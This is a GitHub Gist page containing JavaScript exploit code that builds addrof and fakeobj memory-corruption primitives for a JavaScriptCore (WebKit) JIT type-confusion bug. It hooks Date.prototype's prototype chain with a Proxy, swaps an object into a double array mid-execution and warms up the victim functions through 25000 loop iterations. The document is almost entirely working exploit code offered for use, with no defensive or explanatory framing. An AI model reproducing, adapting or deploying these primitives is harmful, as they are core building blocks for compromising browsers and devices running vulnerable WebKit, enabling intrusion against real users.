Skip to content

Instantly share code, notes, and snippets.

@physuru
Last active April 27, 2022 02:20
Show Gist options
  • Save physuru/d3a2a7a4aefc73df9cc91562a01234bd to your computer and use it in GitHub Desktop.
Save physuru/d3a2a7a4aefc73df9cc91562a01234bd to your computer and use it in GitHub Desktop.
// addrof/fakeobj primitives for qwertyoruiop's jsc bug
var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date();
wtf_date[1] = 1;
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
has: function () {
if (wtf_hack) {
wtf_confuse[0] = wtf_obj;
}
}
});
function addrof(what) {
wtf_confuse = new Array(1), wtf_obj = what;
wtf_confuse[0] = 13.37;
var f64 = new Float64Array(2);
function victim(oj, f64, doubleArray) {
doubleArray[0];
var r = 5 in oj;
f64[0] = doubleArray[0];
doubleArray[0] = f64[0];
return r;
}
for (var i = 0; i < 25000; i++) victim(wtf_date, f64, wtf_confuse);
wtf_hack = true;
victim(wtf_date, f64, wtf_confuse);
wtf_hack = false;
return f64[0];
}
function fakeobj(addr) {
wtf_confuse = new Array(1), wtf_obj = {};
wtf_confuse[0] = 13.37;
function victim(oj, doubleArray) {
doubleArray[0];
var r = 5 in oj;
doubleArray[0] = addr;
return r;
}
for (var i = 0; i < 25000; i++) victim(wtf_date, wtf_confuse);
wtf_hack = true;
victim(wtf_date, wtf_confuse);
wtf_hack = false;
return wtf_confuse[0];
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment